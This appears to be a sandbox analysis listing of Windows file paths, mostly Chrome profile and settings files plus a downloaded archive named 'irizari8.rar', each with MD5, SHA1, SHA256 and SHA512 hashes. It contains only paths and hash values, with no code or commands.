SHA1 c8d26477c16e4e240d58e8df3109b35cfcd2e2fb
SHA256 fa9aba643bc37fd5f437f642ededd02e8bb31addb7879f97da58f19cb8ca2dd1
SHA512 85a1a30c3bc5c14138d5b192c7777be50b902bbcbdaaa9048381380f7facbd2abbcd1a7fa2e10746387b5060d9fcc44910e2c96170523251b0ba892feded4c8b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 bf7ef70b3fe86703788bc2087253a9ee
SHA1 1355714441fd3f1e8886e23bf7a494924532ecd9
SHA256 5fa056ddc110087417aa708e007f2734e56448248fd1cf8fcd5bd3f050f58b9d
SHA512 45c028fef5ed04ab764fea1eac699073e00cb0f6d4826e232f1ba2238ff84e3321ff1e3490d731b8b2ce3be7118343dfbdb2cfe0fe9f24e467ce0a6d7953eefc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 1a0b8972e374ce865b2c0927ae0fff2c
SHA1 cdccbaf0b6aa76e794b9a76776a7f4375387cdcf
SHA256 1abe15815787ab9036b68ce9b4dcc497198f7c4ec37b59c8c2e919d8a9cf147e
SHA512 1c9ca927699da1cd44f2f9ac066abf4c7e663582304a5dcb96cb1684af4c0c25216d42430645ea3e5297b3b6fc98e124dcf05d8592709750cc4042c66946f893

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 aa0cfa4f072a16ddd95c7c94521a99b9
SHA1 ab0fe7cd7dde90bb5522981a1f25b6eedec8a16d
SHA256 1d24d3ff38d775b6e3125999b6baab0d7aed69cec30d6370ec40855e304b6aa9
SHA512 b8b05f6255a5928273b56390179d5d8485dc2e051e0c637f54d5c098d00c22267fdd4fc33e1bf5e164c519060db34a4872247025280326fdf41a9d8c00f38dc9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b7eda6b1536d46fdbdc86bfa048e545b
SHA1 7ae41962e25cd8f0fe4ef40e88f7fbfa5b721bc1
SHA256 7d3bcb2b6697e5c29c42d4a9bedaf3ff3696b94f0570182235ec1782fdbb8e26
SHA512 85663c1dbf17e4bce6c4e856eded379118cee479b24b56b9c747d5ce49603b31a95db3d111d289e0af480a864c8f57f74d36af9439ab116fe0daaef3bf6841a6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

MD5 22ae52a20c629446a0bbab5849deba81
SHA1 3f04fd7a77a566200dd0d69ed515dae5704c59c0
SHA256 b304ff19a2aa2df9f231ec765ea9962f8730b4214d7a9c315b6318199106f176
SHA512 555309bdf5673cbeffbc9b397c22ac49aa6cb3609fcf1570d6f95e7f29be190789469b9d51dcdc6a6ec1b63716f65b6647b91899f421dcc5a811797ee0a78e5d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

MD5 3bc84b49f59decf2dd81d0ec3d9674ef
SHA1 9d020a32d0351f9e9e346fcb8955afa1ffa3f4b7
SHA256 63a394d2ed7b6e69e6c1b28ade0ec3ac6ee54f3e5bbcac989053be2fa6eb3fbb
SHA512 f5186b9fdc5b00eda5625d94cb6054a0ea9bbb49674fe18cfde55e0a8827d2a9ecf0170a076683d840f169e20d3a8b4d18a3ed8513f8728f3a55c66ab423986e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 908604310647ec21abacc0a8405f43e7
SHA1 d513ae5238536f54301e1b8ccc249d90ec7e0fbc
SHA256 2614e05601099351ec84d2d707d127fc013a2a57ae9b149c5c473e08546f9095
SHA512 0766fa5a8e11852b23cd9dd582e7419ff9f20abe041f8a473c7543b1d8bfd873a6ac0e1efe51b23a02b2d23f3ee686c76df0db4f5ceeda6dce56b21a733fb192

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 625237f4a9b57ed63830553bdccc4af8
SHA1 141cbc03abbd55dc0a1887bd8f24565b430d5cc4
SHA256 1f10d6cd202553628fee8eaafd831a6d8eaf13c7b9b728f35882d1ae2427dc0d
SHA512 68948a4e4c42c02eee8b1adae0b9bd3ae09a6b346b6192468ab977b7f5a2370079e5f648810fe0fb6e6e0e9fd8077921152cee71ef576b4a38054d7d58bcd373

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1e4d4b2bab79d6ed3e1f658317413038
SHA1 33b8184dddd297d958ce37f05ccfdbcb6c673938
SHA256 13b4d66f49b3a6d390fe7b81f621a17453db99eeb214a80c10939f931f687226
SHA512 d098cd3b223ac6d7465ad5e0d800b1d3eb19c56e2c974acda0ec6ea5c028f3c1d8d12a3b392e5068871d3df0147b6db28be25345f8ddb999356008a1a023f227

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 df4464dc5a8e7c13c100f33dbe09d148
SHA1 09ec10aebf88279dc502925be5a5a758e3a123fd
SHA256 a47674ed829a5491545b15a62d6b0897af7cac84eea54cc3cbb4d7108abb5300
SHA512 7e6fef888ec8f100dc5481a2453cf01ce4f901719d8c5842b1b87e2faf0db2884785d47d094cb56ff0d18869bac38a3e09af5d50de3de8ac09ab7594a05918f4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

MD5 d26a5e5c3c1fee6e6e8c010fd0aca03e
SHA1 2cb3a0f5fea7374c7e818bf59add7a367517d640
SHA256 9b10a8606727448a0dc7b231ce9d2e168ae65f994bcb0ec76798bbad58197e6c
SHA512 3687da755ec04e5d1d454dd954cc8e1634d64db44ddbeb1dce7f3e952d8fe85be87dade226b5d10270bc2b391329e43dfaffc3c8d35ca1421711b2e77102f156

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 7b5448dd7e1f8e49a6a617756fd8b574
SHA1 ad88978e4927206e8aeae353a2ba708ed21f961b
SHA256 2df2992b5eb13128688a3520e5e67cc0672cc0846d1ee4594b861bb6cae599c8
SHA512 9b55ba00c84be51afe9a924a8039767431e883cace4e4b1d1c6d782862e450b45bb97b9d60da2d6f306fb4a89fa182ec949dd565c6a07423c0842f7bfc8cdee3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 cef469d20ed9abe4e88cccf6682cb2ec
SHA1 9471f640353a6bf9c80b745376a51fadedc8dbfb
SHA256 ab9788621d6a6e76e27cc69f9596137f75174b261551701feb4f2b4b74fd3c8a
SHA512 5a4648e2b7625535ff2ecf227d2df8504066ea118d9925d44900f47ae4da4965ab759eed4f39915dff51df398e175895919ee7534f051fb60c15b541e1b85803

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4faa3e4c6e3934a7597f710196ef9aaa
SHA1 e339c2655e988e4321f892dc2ab09414806e74a5
SHA256 f34511a3dd6edd97f504c55103c8e5a3523dcb4dfd9da1a6b354d546e20b6341
SHA512 a1e597cd939105a8239e836e1f58c11d04a547ec60aa575a400216e8794ceea41354b4e0e48aa573b6fbb4387b5d36bb06f9410430aaa717447822eaa54049ee

C:\Users\Admin\AppData\Local\Default\_metadata\generated_indexed_rulesets\_ruleset1

MD5 a4d0bafbfa9edfbc1b4627589d0b619b
SHA1 c6e445f767ee0d3b5ec680d2144bb383890e08bb
SHA256 595e6299418d59e41ec5895add6aecd0df3615ab7a7e32271f96d3ddefc78a4c
SHA512 27b7fd70d935542069637f71a33663be6822473eb4d379e8e9623d561623596e333ea4c7f877a311e2780fb422297f6143b0d6da6fecfefa45dca0233002f752

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 e0318545925262ee25623937bc30f43f
SHA1 dcd7b4f9513e205d046fcc3c42bce17f043851d4
SHA256 2233a96a9ee22402cbbc28f09a606e9856e3a5e3a9b5aa005a773481bd520b4e
SHA512 5a34b9e05e09e65775775f054f47e1f25b2246cffa6e18dc29521957512cbd415c184296664ce4ee48f3fc0be50ce4647bb6a1a5297214c8db7a6f912306b313

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 837d65540defd733c510820fa67cc299
SHA1 1aec8bf054444de0029bb616460101190c2dee36
SHA256 20e3de61f78b21eb3c65ca4f9aa5a90576a02e36eb625c8ed8db42bc32c89e4f
SHA512 65003f2813dfd74329ac86657985eea69fbebaf05d36e25839dc33bb24e9fe5b411d381f83d5b4c05dd4d2ee9675230af22dbd53f9b3fc5d291a9431d88fa6b4

C:\Users\Admin\Downloads\irizari8.rar

MD5 c24730fa97740a5155f53f1bb551a9d1
SHA1 da1664c90c23915e6765d679770aad9df91b709d
SHA256 20dccb2357344b61ade8b56c0854075a461a40ddfe482cc22a68646e713db85d
SHA512 a06df9344305899a5918560455ea79108a015e759f4683ad3aeb56c9ea32e109b56a4f9f4cb6538771d9afda21700f65d56a127ef85a1e9a50eb3bf545649c38

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnppepmebaijhkghebgnogijhbmopafg\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 5147aefeb64ead35967a6fba218f22cb
SHA1 4b77ade29b010bad1b77a894f8916497fb89653e
SHA256 da3484a3e5e05c1ed2e234652f337f31178b7814282fb6514179c22cbf15b5a9
SHA512 7e68cf7cf84dd557c8694f2cdb27d6f7d7ad1febe82fe6b5ba7511d202635a32d9ee2b6abc2888e8f58c015c97fb2a4a54b5146a95ff411c3b2131755ab10d2b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 40c733db499508307b9301f567787ebb
SHA1 75c119d790e49572e2b4286acd387689385a90d4
SHA256 f3a75929c1301424d203c5370a5bc2406fbf17a6aa8d20529032f0b9d8f4962e
SHA512 10263e2f22268ddbcee9113d6edafd9bdb318e28a5948d1b78a8d33b9dcb3a042c97ee809a7d9fa7a9a03fb963120f084ceb1635bca15bc15e60dbf22a984b1f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f3044fa43ae21a6ce002a2e666995c5e
SHA1 cb33578cd98e647e2e0957d0f5fa759e07a25c96
SHA256 32775497a76de5479b61416af564be583039ea19138f2a2955556d2af70c6427
SHA512 383258f3a250c73e409816391c65211fd37573923ee952e4344d82b246e7c5f3e689e35202dc268bdfb9881c8208a81fbbb9011a3fc35185523c2706a3ccb063